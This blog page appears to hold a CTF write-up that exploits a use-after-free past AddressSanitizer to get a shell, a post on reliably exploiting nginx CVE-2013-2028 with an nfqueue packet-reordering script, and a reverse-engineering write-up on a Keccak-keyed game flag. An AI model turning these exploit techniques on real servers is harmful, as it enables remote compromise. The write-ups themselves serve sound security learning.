Thursday, April 30, 2015

Confidence 2015 Teaser: Quarantine Write-Up (pwn 500)

In this post we are going to describe two alternative solutions to the quarantine challenge from the Confidence 2015 Teaser organized by DragonSector. This was a very interesting challenge, and even though it took dreyer and me a looong time to solve it I really enjoyed working on it.

Let's start with the challenge description:
The developers of this service think they have found a way to automatically thwart all memory corruption attacks. Can you prove them wrong?

The service is running at

Files: quarantine
Disclaimer: the exploit code below is far from elegant and can probably be greatly improved, but hey it's for a CTF and in those conditions whatever works is good enough ;-p

Preliminary analysis

The quarantine file is the main binary, which uses the file to interpret brainfuck programs. When we load the binary into IDA, we see that it has been compiled with AddressSanitizer (or ASAN), which is what the challenge description refers to when it says "a way to automatically thwart all memory corruption attacks."

A quick check with checksec reveals the following:
gdb-peda$ checksec 
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED

So we not only have to deal with ASAN, but we have a binary with full ASLR, NX and RELRO. This is gonna be fun :)

Let's move on with the analysis. The main binary listens on a given port (passed as a parameter on the command line) and forks for each client. This means that ASLR is not such a big deal, since the addresses will remain constant for each client and we can reuse leaks from ASAN's error reporting for our exploit.

When we connect to the service, it provides the following options:
__________               .__        _____              __    
\______   \____________  |__| _____/ ____\_ __   ____ |  | __
 |    |  _/\_  __ \__  \ |  |/    \   __\  |  \_/ ___\|  |/ /
 |    |   \ |  | \// __ \|  |   |  \  | |  |  /\  \___|    < 
 |______  / |__|  (____  /__|___|  /__| |____/  \___  >__|_ \
        \/             \/        \/                 \/     \/
        _____                .__    .__                      
       /     \ _____    ____ |  |__ |__| ____   ____         
      /  \ /  \\__  \ _/ ___\|  |  \|  |/    \_/ __ \        
     /    Y    \/ __ \\  \___|   Y  \  |   |  \  ___/        
     \____|__  (____  /\___  >___|  /__|___|  /\___  >       
             \/     \/     \/     \/        \/     \/        

Choose your option:
  add:    Adds a new virtual machine.
  remove: Removes a virtual machine.
  change: Changes the virtual machine program.
  select: Selects a virtual machine to use.
  run:    Starts the execution of a virtual machine.
  exit:   Terminates the connection.

Since the developers of this system think they do not need to care about memory corruption due to the use of ASAN, the code is full of bugs.

Additionally, if we look at the main command handler in the binary we find a hidden give_me_the_flag command. The function handling this command opens the flag.txt file, reads it into a global buffer and outputs it using printf.

Unfortunately, when entering this command we overflow a stack buffer and get detected by ASAN. So it seems we'll need to do some more work than this ;)

Reverse engineering the main binary

When analyzing the code in the main binary, we find that the program keeps a linked list of VMs. The linked list starts at the first_vm global symbol, and VMs are always added at the front of the list.

When a vm is selected, the current_vm symbol is set to point to it. When run is executed, the selected VM is executed as you can see in this code:

__int64 __cdecl run()
  __int64 v0; // rdx@0
  __int64 v1; // rcx@0
  const char *v2; // rsi@0
  __int64 v3; // r8@0
  unsigned __int64 v4; // r9@0
  __int64 result; // rax@2
  char v6; // [sp+0h] [bp-10h]@0

  if ( globals::current_vm[0] )
    LODWORD(result) = vm::run(globals::current_vm[0]);
    LODWORD(result) = printf(
                        "No machine selected for execution. Please use the \"select\" command first.\n");
  return result;
When a VM is removed, the code goes through the list of VMs until it finds the right VM and frees it. However, if the VM is not the first_vm the code forgets to check whether current_vm points to it or not.

Therefore, if we select a VM (other than first_vm, i.e. the last added VM) and then remove it, we get a dangling pointer as the current_vm. If we manage to reallocate this memory, we would have a VM structure totally under control.

Reverse engineering the VM structure

Before we move on, we also need to understand the data structure used to keep track of the VMs and how they are used. We can do that by looking at the code initializing VMs in the main binary or by looking at the code. I found it easier to look at the code since it is not so cluttered with ASAN's stuff.

The data structure used to represent a VM looks like this (as defined in my IDA database):

00000000 bfvm            struc ; (sizeof=0x38)
00000000 array           dq ?                    ; XREF: vm::run(vm::VMState *)+1D0 r
00000000                                         ; vm::run(vm::VMState *)+1FD r ...
00000008 arraysz         dd ?
0000000C field_C         dd ?
00000010 program         dq ?
00000018 progamsz        dd ?
0000001C idx             dd ?                    ; XREF: vm::run(vm::VMState *)+1C7 r
0000001C                                         ; vm::run(vm::VMState *)+1F4 r ...
00000020 field_20        dd ?
00000024 field_24        dd ?
00000028 name            db 16 dup(?)
00000038 bfvm            ends

When the vm::run method is called, first vm::reset_state is called on the VM. This is what this method does:

__int64 __fastcall vm::reset_state(struct bfvm *a1)
  __int64 result; // rax@2
  unsigned int i; // [sp+0h] [bp-Ch]@1

  a1->idx = 0;
  for ( i = 0; ; ++i )
    result = i;
    if ( i >= a1->arraysz )
    *(_BYTE *)(a1->array + i) = 0;
  return result;

Thus, it takes the array pointer and zeroes it out. Next, it enters a loop of processing instructions. A bounds check of the array pointer is performed, and if it fails an error is printed, the VM is reset and the program exits. If the array pointer is within bounds, the code parses the command at the current program counter and executes it.

Note that if a loop is found ([ or ]), the code also performs a search for the matching bracket and prints an error if it cannot find it. These error prints are performed using printf, which will become important in our solution later on ;-).

ASAN and Use-After-Free conditions

So now we have an idea of what our dangling pointer will be used for: to zero out a piece of data, run a brainfuck program using this data as the brainfuck VM memory, and finally zero it out again before returning.

Now we need to figure out how to exploit a Use-After-Free in presence of ASAN. During the CTF, we had no idea on how ASAN worked internally, so we started looking around in Google. One of the key resources was this post from Scarybeast.

In this post, a C program is provided that will trigger a use-after-free without ASAN noticing it. The code is based on allocating and freeing a lot of memory in order to achieve a reallocation of the freed chunk.

We used this code as a basis, and made some experiments on our test machine. Here is the relevant code fragment:

for i in xrange(40):
 add("vm%d" % i, 56, "A"*50, 56)

for i in xrange(i+1, i+loop):
        print i
        add("vm%d" % i, 128, "A"*100, 0x400000)
for i in xrange(i+1, i+loop):
        print i
        add("vm%d" % i, 56, "A"*56, 0x400000)
After some experiments, we figured that our local machine with the default configuration required a value of 300 for the loop variable in order to trigger the re-allocation of the removed VM. For the remote machine a value of 60 worked well during the CTF. When run with ASAN_OPTIONS=quarantine_size=16777216 on my local machine, the binary behaves similarly to the remote server. So if you want to test the exploits below, you can use these settings.

The way the ASAN UaF detection system works is based on introducing a quarantine zone where freed chunks are kept for a while. The quarantine zone is only freed after a certain amount of memory has been placed into it (similar to Microsoft's delayed free in Internet Explorer). The hope is that with this approach, use-after-free conditions will be easily caught during fuzzing/testing since it is unlikely that so much memory is freed and reallocated before the reuse of the dangling pointer.

Anyway, with the above code (in particular with the freeing of big amounts of data) we managed to evict the target chunk from the quarantine and get it allocated again. So now it's time to move on and exploit this bug!

Solution 1: getting a shell

So let's first discuss our own solution, and then discuss the intended challenge solution. Our own solution was to use the UaF to get overwrite some arbitrary memory and get a shell.

The binary uses RELRO, so we cannot target the GOT. However, ASAN places some hooks in functions such as printf, scanf, etc. as you can see here:

int __fastcall printf(__sanitizer::StackTrace *this, const char *a2, __int64 a3, __int64 a4, __int64 a5, unsigned __int64 a6, char a7)
  int (__fastcall *v7)(_QWORD, _QWORD); // rcx@6
  int (__fastcall *v8)(_QWORD, _QWORD); // rax@7
  char v10; // [sp+0h] [bp-108h]@1
  const char *v11; // [sp+8h] [bp-100h]@1
  __int64 v12; // [sp+10h] [bp-F8h]@1
  __int64 v13; // [sp+18h] [bp-F0h]@1
  __int64 v14; // [sp+20h] [bp-E8h]@1
  unsigned __int64 v15; // [sp+28h] [bp-E0h]@1
  __int128 v16; // [sp+B0h] [bp-58h]@1
  char *v17; // [sp+C0h] [bp-48h]@1
  __int128 v18; // [sp+D0h] [bp-38h]@4
  char *v19; // [sp+E0h] [bp-28h]@4

  v15 = a6;
  v14 = a5;
  v13 = a4;
  v12 = a3;
  v11 = a2;
  v17 = &v10;
  *((_QWORD *)&v16 + 1) = &a7;
  *(_QWORD *)&v16 = 206158430216LL;
  if ( !__asan::asan_init_is_running )
    if ( __asan::asan_inited
      || (__asan::AsanInitFromRtl(this, (signed __int64)&__asan::asan_init_is_running, a2, a6),
          !__asan::asan_init_is_running) )
      if ( !__asan::asan_inited )
        __asan::AsanInitFromRtl(this, (signed __int64)&v18, a2, a6);
      v19 = v17;
      v18 = v16;
      if ( __sanitizer::common_flags_dont_use[56] )
        a2 = (const char *)&v18;
        sub_46F70(this, (unsigned __int64)&v18, (const char *)&v18);
  v7 = *(int (__fastcall **)(_QWORD, _QWORD))__interception::real_vprintf;
  if ( __sanitizer::indirect_call_wrapper )
    LODWORD(v8) = __sanitizer::indirect_call_wrapper(*(_QWORD *)__interception::real_vprintf, a2);
    v7 = v8;
  return v7(this, &v16);
So we targeted this call. Our strategy is create a fake VM structure that contains the following data:

  • Array pointer: quarantine+0x4FE328, which is the address of the real_vprintf symbol above.
  • Array size: 8 bytes (the size of a pointer in x64)
  • Program: pointer to the heap, where we'll have prepared a brainfuck program
Then, the brainfuck program will perform a series of ", >" commands. This will read from standard input using getchar, write it over the target symbol and increment the data pointer. With this we can control the value of the real_vprintf hook.

The next step is actually triggering the call without exiting the VM. If we exit the VM, the data will be zeroed so we'll crash with a null pointer exception. 

But since our VM interpreter calls printf on error conditions, we just need to trigger one! What we did was adding a bunch of [ at the end of the VM program, such that the loops were out of balance and printf would be called.

The final question is what to overwrite real_vprintf with. Our first attempt was to use the give_flag() address, since the code already reads the flag and prints it out. Unfortunately, it does so via printf and this results in an infinite recursion... so we turned into executing a shell.

For this, we use the following gadget:

.text:000000000004652C                 mov     rax, cs:environ_ptr_0
.text:0000000000046533                 lea     rdi, aBinSh     ; "/bin/sh"
.text:000000000004653A                 lea     rsi, [rsp+180h+var_150]
.text:000000000004653F                 mov     cs:dword_3C06C0, 0
.text:0000000000046549                 mov     cs:dword_3C06D0, 0
.text:0000000000046553                 mov     rdx, [rax]
.text:0000000000046556                 call    execve

So in the end our exploit code looks like this (see complete exploit here):

print "[*] Performing initial allocations"
# First allocate a few VMs
for i in xrange(40):
 add("vm%d" % i, 56, "A", 56)

# Select and free one of them
print "[*] Creating UAF condition"

# Put lots of memory into the quarantine
print "[*] Freeing enough memory..."
for i in xrange(i+1, i+loop):
        add("vm%d" % i, 128, "A"*100, 0x400000)

print "[*] Reallocating memory"
for i in xrange(i+1, i+loop):
        add("vm%d" % i, 56, p64(printf)+p32(8)+"XXXX" + p64(heap)+ p32(30) +",,,,,,,>,>,>,>,>,>,>,>,>,[[[[[", 0x400000)

print "[*] Triggering shell! "
#  # Exit for my own libc
x.send("echo w00t;\n")
print "[*] Everything ok! Dropping into shell."

Which gives the following output when we run it on my test machine:
sfx@ubuntu:/mnt/hgfs/conf2015q/quarantine$ python
[+] Opening connection to localhost on port 1234: Done
[*] Performing initial allocations
[*] Creating UAF condition
[*] Freeing enough memory...
[*] Reallocating memory
[*] Triggering shell! 
[*] Everything ok! Dropping into shell.
[*] Switching to interactive mode
uid=1000(sfx) gid=1000(sfx) groups=1000(sfx),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),124(sambashare)
$ uname -a
Linux ubuntu 3.16.0-31-generic #43-Ubuntu SMP Tue Mar 10 17:37:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
$ cat flag.txt

Which during the CTF resulted in the following flag:
[*] Switching to interactive mode
 $ cat flag.txt

Solution 2: zero-out shadow memory

It turns out the intended solution was actually slightly easier than our solution. ASAN works by keeping a shadow memory region in which it keeps track of the state of different memory areas. When it finds a problem, it reports where the fault originated and what the associated shadow region is.

For example, if we try to run the give_me_the_flag command we get this:
Option: give_me_the_flag
==115178==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffcb44e248 at pc 0x7f2cc53068f6 bp 0x7fffcb44e0c0 sp 0x7fffcb44d858
WRITE of size 17 at 0x7fffcb44e248 thread T0
    #0 0x7f2cc53068f5 (/mnt/hgfs/conf2015q/quarantine/quarantine+0x458f5)
    #1 0x7f2cc53076b0 (/mnt/hgfs/conf2015q/quarantine/quarantine+0x466b0)
    #2 0x7f2cc5380493 (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbf493)
    #3 0x7f2cc537dd34 (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbcd34)
    #4 0x7f2cc3ca0ec4 (
    #5 0x7f2cc537c0bc (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbb0bc)

Address 0x7fffcb44e248 is located in stack of thread T0 at offset 40 in frame
    #0 0x7f2cc53803bf (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbf3bf)

  This frame has 1 object(s):
    [32, 40) 'op' <== Memory access at offset 40 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x100079681bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100079681c40: 00 00 00 00 f1 f1 f1 f1 00[f3]f3 f3 00 00 00 00
  0x100079681c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c70: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 04 f2
  0x100079681c80: 00 f2 f2 f2 04 f2 00 00 f2 f2 04 f2 04 f2 04 f3
  0x100079681c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  ASan internal:           fe

This tells us that if we zero out the bytes starting at 0x100079681c49 (shadow1 in my exploit) we should not trigger this detection and we should be able to call this command. As we know, we can do that by pointing the array space of the fake VM structure to this address and then running the VM.

However, if we do this we get another error:

0x7f2cc61dcff0 is located 0 bytes to the right of global variable 'globals::flag_buffer' defined in '' (0x7f2cc61dcfe0) of size 16
SUMMARY: AddressSanitizer: global-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0fe618c339a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
=>0x0fe618c339f0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 00[f9]f9
  0x0fe618c33a00: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Which means we actually need to trigger a zero-out again on a second shadow memory region (shadow2), because the flag was too large to fit in the global buffer that was used to read it! Fortunately we can change our VM program by using the change command. We can change the most recent N VMs that we added and then try to run again. After this, we are able to issue the give_me_the_flag command and get the flag :)

This is the final code to do so on my local test machine (full exploit here):

print "[*] Performing initial allocations"
# First allocate a few VMs
for i in xrange(40):
 add("vm%d" % i, 56, "A", 56)

# Select and free one of them
print "[*] Creating UAF condition"

# Put lots of memory into the quarantine
print "[*] Freeing enough memory..."
for i in xrange(i+1, i+loop):
        add("vm%d" % i, 128, "A"*100, 0x400000)

print "[*] Reallocating memory"
# And reallocate it
for i in xrange(i+1, i+loop2):
        add("vm%d" % i, 56, p64(shadow1)+p32(16)+("%.4x" % i) + p64(heap)+ p32(30) +"+", 0x400000)

print "[*] Zeroing shadow memory for stack buffer"
# Zero out shadow1

print "[*] Replacing program "

# Now replace the fake VM struct to zero out shadow2
for i in xrange(20):
 change(i, p64(shadow2)+p32(20)+"XXXX" + p64(heap)+ p32(1) +"+")

print "[*] Zeroing shadow memory for global buffer"
# And actually do it

# And now just send give_me_the_flag
x.readuntil("Your flag is:")
print "[*] YOUR FLAG: " , x.readuntil("\n")
And when we run it:
sfx@ubuntu:/mnt/hgfs/conf2015q/quarantine$ python 
[+] Opening connection to localhost on port 1234: Done
[*] Performing initial allocations
[*] Creating UAF condition
[*] Freeing enough memory...
[*] Reallocating memory
[*] Zeroing shadow memory for stack buffer
[*] Replacing program 
[*] Zeroing shadow memory for global buffer

[*] Closed connection to localhost port 1234

Wednesday, July 24, 2013

Nginx reliable explotation through the internet (CVE-2013-2028)

This vulnerability was published recently (CVE-2013-2028) and it seems that many exploiters got stuck because the socket will not block because the buffer is longer than the standard ethernet MTU, some others have found another attack vector without that problem.

Let me to explain how we have achieved to overcome the non-blocking socket impediment without doing so much:

When packets arriving at the TCP layer are analyzed and once determined the sequence are immediately delivered to the upper layer of the OSI model.

Let's imagine that you want to overflow a big buffer through the network. Normally you would execute something like:

send(sock, "AAAAA….A",…);

If the size of the data is bigger than the MTU, is then splitted into multiple packages. The destination processes the information on many smaller packages instead of one. In summary,a single read()/recv() doesn't get all the data it asked for and the overflow will not happen.

And that's what's happening on ngingx.

What we have done to prevent that packets are delivered directly to the next layer is taking profit of TCP windows and TCP reorder: sending the first data packet on the last place.

What happens is that the TCP stack will not deliver the packets to the next layer because the information is not complete, and just wait until all information (up to the size of the tcp window) is received to deliver it.

Then the application layer will get all the information in _the same_ read and the overflow will happen. 

Using that TCP trick, the size limitation of the overflow is the TCP window size instead the MTU.

One easy and **dirty** way to implement this is using iptables and nfqueue, but there are some better ones:

# iptables -A OUTPUT -p tcp -d ip --destination-port port -j NFQUEUE 
# python 

import nfqueue
import socket
import time

data_count = 0

def cb(dummy, payload): #in some implementations the callback only has one parameter, remove the dummy in that case
        global data_count
        global delayed
        data = payload.get_data()
# DIRTY check for first data packet (not three-way-handshake)
        if len(data) > 60:
                data_count += 1
                if (data_count == 1):
                        print data
# Just DROP the packet and the local TCP stack will send it again because won't get the ACK.
                data_count = 0

q = nfqueue.queue()
except KeyboardInterrupt:
        print "Exiting..."
Albert Puigsech Galicia
+ Mail:
+ Jabber:
+ Twitter: @apuigsech

Saturday, April 27, 2013

PlaidCTF 2013 - kavihk (binary 400) write-up

Here is another PlaidCTF write-up, in this case for a challenge that we didn't solve but had almost finished by the time the CTF ended (except for a couple (mostly stupid) things I'll mention later on). In this case it was kavihk, which was a binary worth 400 points. In the archive we can see both the kavihk binary and the source code it is based on, avih.

Avih "is a roguelike game whose source code fits in exactly 1024 bytes". So as you can imagine, the C code itself looks awful... everything in one line, abusing macro's, etc.

Luckily for us, there is a file named 'avih-commented.c' in the archive, that breaks the code down into pieces that we can more easily digest. Just for giving you a taste of it (you can see the whole thing in the archive), this is what the portion that draws the screen looks like:

  /* draw screen */
   /* determine tile colour */
   /* check for visibility */
   /* memory */
   /* draw */

The code is using ncurses, and presents the user with a mesh filled with monsters, gold, talismans, etc. Now, looking at the binary the first thing we notice is that when the game finishes the following code (I'll call it 'youwin') is executed:

int __cdecl sub_8049581()
  int result; // eax@12
  char dest; // [sp+2Fh] [bp-9h]@2

  while ( (unsigned int)dword_804CB14 <= 0x1D )
    if ( sub_804A1A5((int)&unk_80549C0, 0, 0, &dest, 8) )
    byte_804CAD0[dword_804CB14] ^= dest;
  if ( byte_804CAD5 != '_'
    || byte_804CADB != '_'
    || byte_804CADE != '_'
    || byte_804CAE2 != '_'
    || byte_804CAE7 != '_'
    || byte_804CAED )
    result = (int)"WIN    ...but no flag for you.";
    result = (int)byte_804CAD0;
  return result;

So it seems the buffer at 0x0804CAD0 is actually our (30 bytes long) flag, but it is XORed with something that comes out of the function at 0x0804A1A5. The flag contains a few underscores and ends in a null byte, and this format is used to sanity check the result of the XOR before printing it. If the sanity check doesn't pass, then we are told we won the game, but there is no flag for us :(.

Based on these observations, patching the game to win it won't work. We'll need to reverse further and understand how the XOR key is generated. For this, I tracked cross-references to 'unk_0x80549C0' and found that only three functions use it: the main function, a function that's called in main during initialization, and the function that checks the flag.

I renamed this variable as 'state' so I could easily follow it later on in my idb, and looked at main and compared it to the code we are given:

int __cdecl main()
  char v0; // dl@18
  signed int v1; // eax@23
  int v2; // eax@36
  bool v3; // edx@43
  bool v4; // eax@46

  if ( sub_804A134(&state, 34, 1566) )
  for ( *(_DWORD *)&dword_805C958 = 0; *(_DWORD *)&dword_805C958 <= 7; ++*(_DWORD *)&dword_805C958 )
    init_pair(dword_805C958 + 1, dword_805C958, 0);
  uses_state(); //This function uses 'state' internally
  while ( *(_DWORD *)&dword_805C958 != 27 ) {
  /* ... */

The first function seems to be some initialization, as diving into it shows that it initializes some tables and so on... maybe some cryptographic function? In any case, this is what the function looks like:

signed int __cdecl sub_804A134(void *s, unsigned int a2, int a3)
  signed int result; // eax@2

  if ( a2 + a3 == 1600 )
    if ( a2 && a2 <= 1600 )
      *((_DWORD *)s + 50) = a2;
      *((_DWORD *)s + 51) = a3;
      *((_DWORD *)s + 52) = a2 - 2;
      result = 0;
      result = 1;
    result = 1;
  return result;

I dove into the other two sub-functions, and saw they were initializing some global arrays... but I didn't really attempt to understand them yet. I wanted to get a bigger picture of what is going on before diving into the details. So I called this function 'init_state', noted the 1600 magic (together with the 34 and 1566 passed into it) and went on to the next function.

Now, this function is much bigger, but we see that it passes the state into 'sub_804A1A5' (remember, this is the same function that generated our XOR key) and uses an output from it as a random seed:

int __cdecl uses_state()
  bool v0; // eax@19
  bool v1; // eax@23
  signed int v2; // ebx@36
  int result; // eax@37
  int dest; // [sp+3Ch] [bp-Ch]@7

  if ( sub_804A1A5((int)&state, &dword_80549B0, 32, 0, 0) )
  if ( sub_804A1A5((int)&state, &dword_804CABC, 32, 0, 0) )
  if ( sub_804A1A5((int)&state, &dword_8054AA8, 32, 0, 0) )
  if ( sub_804A1A5((int)&state, 0, 0, &dest, 32) )
  /* ... */

At this point I first followed the actual game logic and compared all variables with the commented avih source code we were given. This allowed me to find out that the values passed to sub_804A1A5 actually contain the current level, the maximum health points our character can have at this moment, and the amount of gold collected so far.

This seems to indicate that we'll have to 'play' one specific game (i.e. collecting the right amount of gold, right amount of talismans at each level) so we can get the key. Before I went on with that, I first wanted to understand what it was that it was using for generating the XOR key... so I dove into sub_804A1A5, which I now call do_sha3.

Going in, after a couple levels of calls, you see this:

int __cdecl sub_804A6CB(int a1)
  char v2; // [sp+18h] [bp-D0h]@1

  sub_80489B5(1, "Input of permutation", a1);
  sub_804A51C(&v2, a1);
  sub_804A603(a1, &v2);
  return sub_80489B5(1, "State after permutation", a1);

Additionally, if you dive into the second call (sub_804A795) you see this code:

int __cdecl sub_804A795(int a1)
  int result; // eax@1
  unsigned int i; // [sp+1Ch] [bp-Ch]@1

  result = sub_80489DE(3, "Same, with lanes as pairs of 32-bit words (bit interleaving)", a1);
  for ( i = 0; i <= 0x17; ++i )
    sub_8048BBE(3, i);
    sub_80489DE(3, "After theta", a1);
    sub_80489DE(3, "After rho", a1);
    sub_80489DE(3, "After pi", a1);
    sub_80489DE(3, "After chi", a1);
    sub_804B175(a1, i);
    result = sub_80489DE(3, "After iota", a1);
  return result;

So at this point I just decided to google for cryptographic functions (I thought it was likely to be a hash) that contained a permutation, lanes and blocks called theta, rho, pi, chi, iota. This search leads very fast to Keccak, or SHA-3 (notice the k's in the same place as the challenge name? :) ).

Good, it seems we have our hash function that will help generate the key. Now we need a bit more reversing to figure out what options we have for the different variables involved. The first one is the game level... this is easy, since we can track the 'youwin' function back to its caller and see under what condition it is called:

    if ( current_level == 9 )
      v2 = youwin();
      v2 = (int)"kavihk";
      "H:%d/%d W:d%d L:%d $%d %s",

So we have levels 0 to 9. In the level initialization function, we find that the level starts at 0 but is increased during initialization. Thus, the level value is 1-8 while we play the game, and is 9 when we have won.

Next, we need to figure out what happens with the gold... so we go back to the initialization function and check cross-references to the gold_collected variable. This brings us to the main loop, where this check is performed:

    if ( dword_804CB20[90 * (a1 + dword_80549B4) + a2 + dword_8054AA0] == '$' )
      gold_collected += current_level;

Ok, this means that each time we find a dollar sign, we will increase our gold by a number equal to the current level. Something similar happens with the max_life_points when finding a talisman:

   if ( dword_804CB20[90 * (a1 + dword_80549B4) + a2 + dword_8054AA0] == tailsman )
      max_health_points += current_level;
      dword_804CB20[a2 + dword_8054AA0 + 90 * (a1 + dword_80549B4)] = empty_space;
    } question: how many dollar signs and how many talisman signs can we find at each level? For this we need to go to the level initialization code again. I reversed this function quite a bit, comparing with the original code, so I knew that there is a function to fill in random empty spots, and an array with elements used to fill in the game grid.

So looking at this code, we find the following:

  player_y = 0;
  for ( b_tmp_var = 0; b_tmp_var <= 8; ++b_tmp_var )
    if ( current_level <= 8 )
      fill_random_position(elems[b_tmp_var]);   // fill objects
  for ( b_tmp_var = 0; ; ++b_tmp_var )
    result = b_tmp_var;
    if ( 2 * current_level <= b_tmp_var )       // 2*level monsters!
    r = rand();
    fill_random_position(r % (7 * current_level / 5) + 'c');// Fill monsters
  return result;

So this shows that we use the 9 initial items of 'elems' to fill in objects for the level. These are the contents of the array:

.data:0804CA80 elems           dd '$'                  ; DATA XREF: init_level+31A r
.data:0804CA80                                         ; main+163 r
.data:0804CA84                 dd '`'
.data:0804CA88                 dd '*'
.data:0804CA8C                 dd '$'
.data:0804CA90                 dd '.'
.data:0804CA94                 dd '@'
.data:0804CA98                 dd '`'
.data:0804CA9C                 dd '>'
.data:0804CAA0                 dd ']'

This tells us that there are two dollar signs and two talismans (the ` sign) in each level. So now we have all the information required to solve the level... except for implementing the proper flavor of SHA3. It turns out this costed me quite some time, and several stupid mistakes were made during that time (yes... after ~40 hours of CTF my mind is not in a very fresh state anymore :( ).

I first downloaded a python reference implementation from the Keccak website... but soon found out that the 34 and 1566 values (rate and capacity) were not supported by it (they had to be multiples of 8). So I moved into the C reference implementation... and found there was A LOT of code and it was very confusing to me at that moment.

So I decided to take 'a shortcut': reuse the implementation in the binary by means of injecting a dynamic library. I created a file implementing a 'start_color' function, which is called near the beginning of the game. From there, I could call the different functions in the game in a loop by means of function pointers. This is how the initial code looked (it is still missing some of the logic, but I don't have it at hand anymore) like:


int (*do_sha3)(void *state,void *in, int insize, void *out, int outsize);

int  start_color(void){
  int current_level=0,max_health_points=18,gold_collected=0;
  int dest;
  char buffer[16]; //This is for the last one
  const char *key = "\\\xf7\x8f/ny\xccy\xdc \x12\x0euj\x89\xd72P\xb2\xd2\xb1\x16\xd9\xe0\xde\xbf?\xf6\x1b\x08";
  // int level;
  do_sha3 = 0x0804A1A5;
  void * sha3_State = 0x080549C0;
    do_sha3(sha3_State, ¤t_level, 32u, 0, 0);
    do_sha3(sha3_State, &max_health_points, 32u, 0, 0);
    do_sha3(sha3_State, &gold_collected, 32u, 0, 0);
    do_sha3(sha3_State, 0, 0, &dest, 32u);
    // current_level++;
    printf("Level: %d = %.8x\n", current_level+1, dest);
  return 0;

From this code, I implemented a brute-forcer to go through the options... but it turned out to be awfully slow (specially within a single-core VM where I couldn't really paralellize anything). This means we need a faster implementation... so I had to dive into the damn Keccak reference code in C.

Now, during the CTF I couldn't find the exact functions that our binary was using, so I used lower level functions and made wrappers around them to look like the ones in the binary. However, I failed at restoring the encrypted flag and also I failed at the number of iterations through the levels.

It turns out that, although there are only 8 levels that the user plays, the level initialization routine is called 9 times. This means that the sha3 over the current_level, max_health_points and gold_collected is performed 9 times, not 8. Yes, in the code above it looks ok. But no, in my bruteforcer I failed to do it and set it to 8 (shame on me!), which is one of the reasons it failed during the CTF.

During the CTF I asked a couple stupid questions to clockish (who created the challenge) to check that I was still relatively sane... when the CTF ended. At this point, he told me I should have used the 'Duplex' functions from Keccak, which are exactly the ones used in the game!

Even then, I had failed at the number of iterations through the loop, and also at memcpy'ing over the global flag (shame on me again! I do too much AES stuff with 16 byte blocks at work, so I used 16 b ytes in the memcpy instead of 30...). Anyway, after the CTF I had some time to fix the problems, and I got to the solution.

The good news is, I was on the right track and had it almost done except for stupid mistakes (if it would have been slightly earlier in the weekend I'm quite confident I'd have finished it). The bad news is we didn't score those 400 points :-/

So in the end, here is the main code that does it:

int main(int ac, char **argv){
    int rate=34;
    int capacity=1600-34;
    uint32_t current_level,max_health_points,gold_collected;
    uint32_t dest=0;
    int i,j,gold,points;
    char *msg;
    const char *key = "\x5c\xf7\x8f\x2f\x6e\x79\xcc\x79\xdc\x20\x12\x0e\x75\x6a\x89\xd7\x32\x50\xb2\xd2\xb1\x16\xd9\xe0\xde\xbf\x3f\xf6\x1b\x08";

    // spongeState   state;
    max_health_points = 0x12;
        printf("[*] i = %d\n" , i);

         //Reinitialize game options
            max_health_points = 18;
            gold_collected = 0;

            //Reinitialize state
            init_state(state, 34, 1566);

            //Obtain current guess
            gold = i;
            points = j;

            //Iterate through the levels, increasing gold and max health depending on current guess
                // printf("%d %d %d\n", current_level, max_health_points, gold_collected);
                do_sha3(state, ¤t_level, 32, 0, 0);
                do_sha3(state, &max_health_points, 32, 0, 0);
                do_sha3(state, &gold_collected, 32, 0, 0);
                do_sha3(state, 0, 0, &dest, 32);
                // printf("Computed hash for level %d: %x\n", current_level+1,dest);
                gold_collected += (gold % 3)*(current_level+1);
                max_health_points += (points%3)*(current_level+1);
                points /= 3;
                gold /= 3;


            do_sha3(state, ¤t_level, 32, 0, 0);
            do_sha3(state, &max_health_points, 32, 0, 0);
